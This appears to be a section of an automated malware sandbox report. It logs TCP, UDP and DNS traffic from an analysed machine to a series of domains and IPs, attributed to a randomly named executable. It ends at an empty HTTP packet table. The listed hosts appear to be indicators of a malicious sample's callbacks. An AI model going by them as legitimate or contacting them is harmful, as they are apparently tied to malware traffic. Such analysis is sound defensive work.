              Sep 18, 2024 09:02:38.895998955 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.896019936 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.896121979 CEST4972380192.168.2.682.221.128.183
              Sep 18, 2024 09:02:38.896183014 CEST4972380192.168.2.682.221.128.183
              Sep 18, 2024 09:02:38.901252031 CEST4972380192.168.2.682.221.128.183
              Sep 18, 2024 09:02:38.906069040 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:03:02.041250944 CEST5795180192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:02.046226025 CEST8057951217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:02.046328068 CEST5795180192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:02.057301044 CEST5795180192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:02.062153101 CEST8057951217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:02.686312914 CEST8057951217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:02.686343908 CEST8057951217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:02.686620951 CEST5795180192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:03.571038961 CEST5795180192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:04.589512110 CEST5795280192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:04.706610918 CEST8057952217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:04.706726074 CEST5795280192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:04.721792936 CEST5795280192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:04.726574898 CEST8057952217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:05.348718882 CEST8057952217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:05.348751068 CEST8057952217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:05.348998070 CEST5795280192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:06.227230072 CEST5795280192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:07.246198893 CEST5795380192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:07.251327038 CEST8057953217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:07.251427889 CEST5795380192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:07.261435986 CEST5795380192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:07.268183947 CEST8057953217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:07.268209934 CEST8057953217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:07.910938978 CEST8057953217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:07.911031961 CEST8057953217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:07.911277056 CEST5795380192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:08.774342060 CEST5795380192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:09.792150021 CEST5795480192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:09.802552938 CEST8057954217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:09.802650928 CEST5795480192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:09.808584929 CEST5795480192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:09.813621044 CEST8057954217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:10.462944031 CEST8057954217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:10.463237047 CEST8057954217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:10.463336945 CEST5795480192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:10.465800047 CEST5795480192.168.2.6217.160.0.127
              Sep 18, 2024 09:03:10.470716000 CEST8057954217.160.0.127192.168.2.6
              Sep 18, 2024 09:03:15.647398949 CEST5795780192.168.2.685.159.66.93
              Sep 18, 2024 09:03:15.653103113 CEST805795785.159.66.93192.168.2.6
              Sep 18, 2024 09:03:15.653225899 CEST5795780192.168.2.685.159.66.93
              Sep 18, 2024 09:03:15.667309999 CEST5795780192.168.2.685.159.66.93
              Sep 18, 2024 09:03:15.672188044 CEST805795785.159.66.93192.168.2.6
              Sep 18, 2024 09:03:17.180314064 CEST5795780192.168.2.685.159.66.93
              Sep 18, 2024 09:03:17.358644009 CEST805795785.159.66.93192.168.2.6
              Sep 18, 2024 09:03:17.358702898 CEST5795780192.168.2.685.159.66.93
              Sep 18, 2024 09:03:18.199178934 CEST5795880192.168.2.685.159.66.93
              Sep 18, 2024 09:03:18.204054117 CEST805795885.159.66.93192.168.2.6
              Sep 18, 2024 09:03:18.204157114 CEST5795880192.168.2.685.159.66.93
              Sep 18, 2024 09:03:18.214801073 CEST5795880192.168.2.685.159.66.93
              Sep 18, 2024 09:03:18.219873905 CEST805795885.159.66.93192.168.2.6
              Sep 18, 2024 09:03:19.727258921 CEST5795880192.168.2.685.159.66.93
              Sep 18, 2024 09:03:19.732714891 CEST805795885.159.66.93192.168.2.6
              Sep 18, 2024 09:03:19.732814074 CEST5795880192.168.2.685.159.66.93
              Sep 18, 2024 09:03:20.745935917 CEST5795980192.168.2.685.159.66.93
              Sep 18, 2024 09:03:20.751147032 CEST805795985.159.66.93192.168.2.6
              Sep 18, 2024 09:03:20.751266003 CEST5795980192.168.2.685.159.66.93
              Sep 18, 2024 09:03:20.761667013 CEST5795980192.168.2.685.159.66.93
              Sep 18, 2024 09:03:20.766556978 CEST805795985.159.66.93192.168.2.6
              Sep 18, 2024 09:03:20.766699076 CEST805795985.159.66.93192.168.2.6
              Sep 18, 2024 09:03:22.274064064 CEST5795980192.168.2.685.159.66.93
              Sep 18, 2024 09:03:22.279366970 CEST805795985.159.66.93192.168.2.6
              Sep 18, 2024 09:03:22.279531956 CEST5795980192.168.2.685.159.66.93
              Sep 18, 2024 09:03:23.293046951 CEST5796080192.168.2.685.159.66.93
              Sep 18, 2024 09:03:23.297921896 CEST805796085.159.66.93192.168.2.6
              Sep 18, 2024 09:03:23.298026085 CEST5796080192.168.2.685.159.66.93
              Sep 18, 2024 09:03:23.305459023 CEST5796080192.168.2.685.159.66.93
              Sep 18, 2024 09:03:23.310339928 CEST805796085.159.66.93192.168.2.6
              Sep 18, 2024 09:03:24.018718004 CEST805796085.159.66.93192.168.2.6
              Sep 18, 2024 09:03:24.018807888 CEST805796085.159.66.93192.168.2.6
              Sep 18, 2024 09:03:24.018954039 CEST5796080192.168.2.685.159.66.93
              Sep 18, 2024 09:03:24.053548098 CEST5796080192.168.2.685.159.66.93
              Sep 18, 2024 09:03:24.058527946 CEST805796085.159.66.93192.168.2.6
              Sep 18, 2024 09:03:29.500895977 CEST5796180192.168.2.613.228.81.39
              Sep 18, 2024 09:03:29.505940914 CEST805796113.228.81.39192.168.2.6
              Sep 18, 2024 09:03:29.506026030 CEST5796180192.168.2.613.228.81.39
              Sep 18, 2024 09:03:29.515820980 CEST5796180192.168.2.613.228.81.39
              Sep 18, 2024 09:03:29.520807028 CEST805796113.228.81.39192.168.2.6
              Sep 18, 2024 09:03:30.443711996 CEST805796113.228.81.39192.168.2.6
              Sep 18, 2024 09:03:30.443747997 CEST805796113.228.81.39192.168.2.6
              Sep 18, 2024 09:03:30.443957090 CEST5796180192.168.2.613.228.81.39
              Sep 18, 2024 09:03:31.024360895 CEST5796180192.168.2.613.228.81.39
              Sep 18, 2024 09:03:32.043119907 CEST5796280192.168.2.613.228.81.39
              Sep 18, 2024 09:03:32.055206060 CEST805796213.228.81.39192.168.2.6
              Sep 18, 2024 09:03:32.055352926 CEST5796280192.168.2.613.228.81.39
              Sep 18, 2024 09:03:32.074074030 CEST5796280192.168.2.613.228.81.39
              Sep 18, 2024 09:03:32.081315994 CEST805796213.228.81.39192.168.2.6
              Sep 18, 2024 09:03:33.004784107 CEST805796213.228.81.39192.168.2.6
              Sep 18, 2024 09:03:33.005214930 CEST805796213.228.81.39192.168.2.6
              Sep 18, 2024 09:03:33.005261898 CEST5796280192.168.2.613.228.81.39
              Sep 18, 2024 09:03:33.586653948 CEST5796280192.168.2.613.228.81.39
              Sep 18, 2024 09:03:34.607350111 CEST5796380192.168.2.613.228.81.39
              Sep 18, 2024 09:03:34.612492085 CEST805796313.228.81.39192.168.2.6
              Sep 18, 2024 09:03:34.612651110 CEST5796380192.168.2.613.228.81.39
              Sep 18, 2024 09:03:34.625386953 CEST5796380192.168.2.613.228.81.39
              Sep 18, 2024 09:03:34.631051064 CEST805796313.228.81.39192.168.2.6
              Sep 18, 2024 09:03:34.631578922 CEST805796313.228.81.39192.168.2.6
              Sep 18, 2024 09:03:35.518085003 CEST805796313.228.81.39192.168.2.6
              Sep 18, 2024 09:03:35.518131971 CEST805796313.228.81.39192.168.2.6
              Sep 18, 2024 09:03:35.518265963 CEST5796380192.168.2.613.228.81.39
              Sep 18, 2024 09:03:36.139111042 CEST5796380192.168.2.613.228.81.39
              Sep 18, 2024 09:03:37.151741982 CEST5796480192.168.2.613.228.81.39
              Sep 18, 2024 09:03:37.156785965 CEST805796413.228.81.39192.168.2.6
              Sep 18, 2024 09:03:37.157819986 CEST5796480192.168.2.613.228.81.39
              Sep 18, 2024 09:03:37.164659977 CEST5796480192.168.2.613.228.81.39
              Sep 18, 2024 09:03:37.169604063 CEST805796413.228.81.39192.168.2.6
              Sep 18, 2024 09:03:38.097789049 CEST805796413.228.81.39192.168.2.6
              Sep 18, 2024 09:03:38.098300934 CEST805796413.228.81.39192.168.2.6
              Sep 18, 2024 09:03:38.098354101 CEST5796480192.168.2.613.228.81.39
              Sep 18, 2024 09:03:38.100146055 CEST5796480192.168.2.613.228.81.39
              Sep 18, 2024 09:03:38.104896069 CEST805796413.228.81.39192.168.2.6
              Sep 18, 2024 09:03:43.696453094 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:43.701427937 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:43.701512098 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:43.712222099 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:43.717272997 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286305904 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286324978 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286469936 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:44.286750078 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286762953 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286787033 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286802053 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286803961 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:44.286817074 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286833048 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286848068 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286858082 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:44.286865950 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.286879063 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:44.286907911 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:44.291356087 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.291425943 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.291440964 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.291456938 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.291477919 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:44.291512012 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:44.373039007 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.373533964 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.373549938 CEST8057965162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:44.373588085 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:44.373630047 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:45.227202892 CEST5796580192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.248223066 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.253376007 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.253449917 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.270148993 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.275053024 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.872869015 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.872919083 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.872936010 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.872950077 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.872970104 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.872971058 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.872987032 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.873007059 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.873029947 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.873037100 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.873047113 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.873059988 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.873075008 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.873090029 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.873117924 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.877980947 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.878067017 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.878154993 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.878602982 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.878618002 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.878680944 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.879843950 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.930296898 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:46.959538937 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.959568977 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.959583998 CEST8057966162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:46.959636927 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:47.774147034 CEST5796680192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:48.793613911 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:48.798628092 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:48.798738003 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:48.813105106 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:48.817914963 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:48.818084002 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.478764057 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.478785992 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.478799105 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.478812933 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.478827000 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.478843927 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.478862047 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.478868008 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:49.478883028 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:49.478893042 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.478934050 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:49.479058027 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.479080915 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.479114056 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:49.483865023 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.483880043 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.483896971 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.483910084 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:49.524024963 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:49.569202900 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.569295883 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.569310904 CEST8057967162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:49.569343090 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:49.569364071 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:50.320983887 CEST5796780192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.339735031 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.344813108 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.344938040 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.352747917 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.357750893 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.953883886 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.953902960 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.953913927 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.953923941 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.953934908 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.953946114 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.953958988 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.953974009 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.953975916 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.953989983 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.954003096 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.954061985 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.954092026 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.958800077 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.958832026 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.958842993 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.958858013 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.958895922 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.958960056 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.959120989 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:52.008424044 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:52.042584896 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:52.043503046 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:52.043519974 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:52.043646097 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:52.043646097 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:52.046206951 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:52.051106930 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:57.074094057 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:57.078944921 CEST80579703.33.130.190192.168.2.6
              Sep 18, 2024 09:03:57.079029083 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:57.090363026 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:57.095312119 CEST80579703.33.130.190192.168.2.6
              Sep 18, 2024 09:03:57.763799906 CEST80579703.33.130.190192.168.2.6
              Sep 18, 2024 09:03:57.763892889 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:57.764736891 CEST80579703.33.130.190192.168.2.6
              Sep 18, 2024 09:03:57.764797926 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:58.602335930 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:58.607506037 CEST80579703.33.130.190192.168.2.6
              Sep 18, 2024 09:03:59.621072054 CEST5797180192.168.2.63.33.130.190
              Sep 18, 2024 09:03:59.630793095 CEST80579713.33.130.190192.168.2.6
              Sep 18, 2024 09:03:59.630881071 CEST5797180192.168.2.63.33.130.190
              Sep 18, 2024 09:03:59.641825914 CEST5797180192.168.2.63.33.130.190
              Sep 18, 2024 09:03:59.646904945 CEST80579713.33.130.190192.168.2.6
              Sep 18, 2024 09:04:00.089026928 CEST80579713.33.130.190192.168.2.6
              Sep 18, 2024 09:04:00.089121103 CEST5797180192.168.2.63.33.130.190
              Sep 18, 2024 09:04:01.222692966 CEST5797180192.168.2.63.33.130.190
              Sep 18, 2024 09:04:01.227695942 CEST80579713.33.130.190192.168.2.6
              Sep 18, 2024 09:04:02.231420994 CEST5797280192.168.2.63.33.130.190
              Sep 18, 2024 09:04:02.236464977 CEST80579723.33.130.190192.168.2.6
              Sep 18, 2024 09:04:02.236592054 CEST5797280192.168.2.63.33.130.190
              Sep 18, 2024 09:04:02.246539116 CEST5797280192.168.2.63.33.130.190
              Sep 18, 2024 09:04:02.255692959 CEST80579723.33.130.190192.168.2.6
              Sep 18, 2024 09:04:02.257383108 CEST80579723.33.130.190192.168.2.6
              Sep 18, 2024 09:04:03.649604082 CEST80579723.33.130.190192.168.2.6
              Sep 18, 2024 09:04:03.651444912 CEST5797280192.168.2.63.33.130.190
              Sep 18, 2024 09:04:03.758493900 CEST5797280192.168.2.63.33.130.190
              Sep 18, 2024 09:04:03.763605118 CEST80579723.33.130.190192.168.2.6
              Sep 18, 2024 09:04:05.386298895 CEST5797380192.168.2.63.33.130.190
              Sep 18, 2024 09:04:05.391592979 CEST80579733.33.130.190192.168.2.6
              Sep 18, 2024 09:04:05.395431995 CEST5797380192.168.2.63.33.130.190
              Sep 18, 2024 09:04:05.399148941 CEST5797380192.168.2.63.33.130.190
              Sep 18, 2024 09:04:05.404244900 CEST80579733.33.130.190192.168.2.6
              Sep 18, 2024 09:04:05.880235910 CEST80579733.33.130.190192.168.2.6
              Sep 18, 2024 09:04:05.880253077 CEST80579733.33.130.190192.168.2.6
              Sep 18, 2024 09:04:05.882313967 CEST5797380192.168.2.63.33.130.190
              Sep 18, 2024 09:04:05.882843018 CEST5797380192.168.2.63.33.130.190
              Sep 18, 2024 09:04:05.887650013 CEST80579733.33.130.190192.168.2.6

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 18, 2024 09:02:37.989675045 CEST6088753192.168.2.61.1.1.1
              Sep 18, 2024 09:02:38.218595982 CEST53608871.1.1.1192.168.2.6
              Sep 18, 2024 09:02:41.860179901 CEST5353656162.159.36.2192.168.2.6
              Sep 18, 2024 09:02:42.364696026 CEST53588591.1.1.1192.168.2.6
              Sep 18, 2024 09:02:53.949450016 CEST6493253192.168.2.61.1.1.1
              Sep 18, 2024 09:02:53.959038973 CEST53649321.1.1.1192.168.2.6
              Sep 18, 2024 09:03:02.011790037 CEST5393753192.168.2.61.1.1.1
              Sep 18, 2024 09:03:02.038858891 CEST53539371.1.1.1192.168.2.6
              Sep 18, 2024 09:03:15.486140013 CEST4924853192.168.2.61.1.1.1
              Sep 18, 2024 09:03:15.644802094 CEST53492481.1.1.1192.168.2.6
              Sep 18, 2024 09:03:29.058703899 CEST5657353192.168.2.61.1.1.1
              Sep 18, 2024 09:03:29.498281002 CEST53565731.1.1.1192.168.2.6
              Sep 18, 2024 09:03:43.105700016 CEST5654653192.168.2.61.1.1.1
              Sep 18, 2024 09:03:43.693528891 CEST53565461.1.1.1192.168.2.6
              Sep 18, 2024 09:03:57.059041023 CEST6003753192.168.2.61.1.1.1
              Sep 18, 2024 09:03:57.071719885 CEST53600371.1.1.1192.168.2.6
              Sep 18, 2024 09:04:10.887487888 CEST5217053192.168.2.61.1.1.1
              Sep 18, 2024 09:04:10.901107073 CEST53521701.1.1.1192.168.2.6

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Sep 18, 2024 09:02:37.989675045 CEST192.168.2.61.1.1.10x7ff2Standard query (0)www.nosr.netA (IP address)IN (0x0001)false
              Sep 18, 2024 09:02:53.949450016 CEST192.168.2.61.1.1.10xb36Standard query (0)www.monos.shopA (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:02.011790037 CEST192.168.2.61.1.1.10x956Standard query (0)www.complexity.pubA (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:15.486140013 CEST192.168.2.61.1.1.10x64deStandard query (0)www.nevsehir-nakliyat.xyzA (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:29.058703899 CEST192.168.2.61.1.1.10x93eStandard query (0)www.masteriocp.onlineA (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:43.105700016 CEST192.168.2.61.1.1.10x547Standard query (0)www.kryto.topA (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:57.059041023 CEST192.168.2.61.1.1.10x2832Standard query (0)www.angelenterprise.bizA (IP address)IN (0x0001)false
              Sep 18, 2024 09:04:10.887487888 CEST192.168.2.61.1.1.10xbc15Standard query (0)www.dyme.techA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Sep 18, 2024 09:02:38.218595982 CEST1.1.1.1192.168.2.60x7ff2No error (0)www.nosr.netnosr.netCNAME (Canonical name)IN (0x0001)false
              Sep 18, 2024 09:02:38.218595982 CEST1.1.1.1192.168.2.60x7ff2No error (0)nosr.net82.221.128.183A (IP address)IN (0x0001)false
              Sep 18, 2024 09:02:53.959038973 CEST1.1.1.1192.168.2.60xb36Name error (3)www.monos.shopnonenoneA (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:02.038858891 CEST1.1.1.1192.168.2.60x956No error (0)www.complexity.pub217.160.0.127A (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:15.644802094 CEST1.1.1.1192.168.2.60x64deNo error (0)www.nevsehir-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
              Sep 18, 2024 09:03:15.644802094 CEST1.1.1.1192.168.2.60x64deNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
              Sep 18, 2024 09:03:15.644802094 CEST1.1.1.1192.168.2.60x64deNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:29.498281002 CEST1.1.1.1192.168.2.60x93eNo error (0)www.masteriocp.onlinedns.ladipage.comCNAME (Canonical name)IN (0x0001)false
              Sep 18, 2024 09:03:29.498281002 CEST1.1.1.1192.168.2.60x93eNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:29.498281002 CEST1.1.1.1192.168.2.60x93eNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:29.498281002 CEST1.1.1.1192.168.2.60x93eNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:43.693528891 CEST1.1.1.1192.168.2.60x547No error (0)www.kryto.top162.0.213.94A (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:57.071719885 CEST1.1.1.1192.168.2.60x2832No error (0)www.angelenterprise.bizangelenterprise.bizCNAME (Canonical name)IN (0x0001)false
              Sep 18, 2024 09:03:57.071719885 CEST1.1.1.1192.168.2.60x2832No error (0)angelenterprise.biz3.33.130.190A (IP address)IN (0x0001)false
              Sep 18, 2024 09:03:57.071719885 CEST1.1.1.1192.168.2.60x2832No error (0)angelenterprise.biz15.197.148.33A (IP address)IN (0x0001)false
              Sep 18, 2024 09:04:10.901107073 CEST1.1.1.1192.168.2.60xbc15No error (0)www.dyme.tech13.248.169.48A (IP address)IN (0x0001)false
              Sep 18, 2024 09:04:10.901107073 CEST1.1.1.1192.168.2.60xbc15No error (0)www.dyme.tech76.223.54.146A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • www.nosr.net
              • www.complexity.pub
              • www.nevsehir-nakliyat.xyz
              • www.masteriocp.online
              • www.kryto.top
              • www.angelenterprise.biz

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.64972382.221.128.183803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
